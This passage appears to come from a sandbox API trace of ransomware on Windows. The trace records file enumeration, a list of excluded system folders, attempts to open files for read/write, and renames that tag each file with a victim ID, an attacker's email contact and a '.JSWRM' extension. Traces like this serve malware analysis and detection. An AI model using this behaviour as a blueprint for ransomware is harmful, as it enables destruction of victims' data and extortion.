hHeap=0x1e0000) returned 1 [0067.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.854] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2=".") returned 1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="..") returned 1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="...") returned 1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="windows") returned -1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="recovery") returned -1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="perflogs") returned -1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="documents and settings") returned 1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="system volume information") returned -1 [0067.854] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="msocache") returned -1 [0067.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="micaut.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="micaut.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.866] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.866] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.866] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.866] CloseHandle (hObject=0xffffffff) returned 1 [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0067.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0067.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0067.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0067.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.866] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0067.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.867] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da8b116, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2=".") returned 1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="..") returned 1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="...") returned 1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="windows") returned -1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="recovery") returned -1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="perflogs") returned -1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="documents and settings") returned 1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="system volume information") returned -1 [0067.867] lstrcmpiW (lpString1="mip.exe.mui", lpString2="msocache") returned -1 [0067.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0067.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe.mui", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe.mui", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mip.exe.mui", lpUsedDefaultChar=0x0) returned 11 [0067.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0067.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe.mui", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe.mui", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mip.exe.mui", lpUsedDefaultChar=0x0) returned 11 [0067.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.867] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.868] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0067.868] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.868] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.868] CloseHandle (hObject=0xffffffff) returned 1 [0067.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0067.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0067.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.869] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.869] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x80b88a00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2=".") returned 1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="..") returned 1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="...") returned 1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="windows") returned -1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="recovery") returned -1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="perflogs") returned -1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="documents and settings") returned 1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="system volume information") returned -1 [0067.869] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="msocache") returned -1 [0067.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll.mui", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll.mui", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwLatin.dll.mui", lpUsedDefaultChar=0x0) returned 17 [0067.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll.mui", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll.mui", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwLatin.dll.mui", lpUsedDefaultChar=0x0) returned 17 [0067.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.870] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10083861658848592) returned 0 [0067.870] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.870] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.871] CloseHandle (hObject=0xffffffff) returned 1 [0067.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0067.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0067.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0067.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.871] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.871] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dab1374, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0067.871] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2=".") returned 1 [0067.871] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="..") returned 1 [0067.871] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="...") returned 1 [0067.871] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="windows") returned -1 [0067.871] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="recovery") returned 1 [0067.871] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="perflogs") returned 1 [0067.872] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="documents and settings") returned 1 [0067.872] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.872] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="system volume information") returned -1 [0067.872] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="msocache") returned 1 [0067.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtscom.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtscom.dll.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, 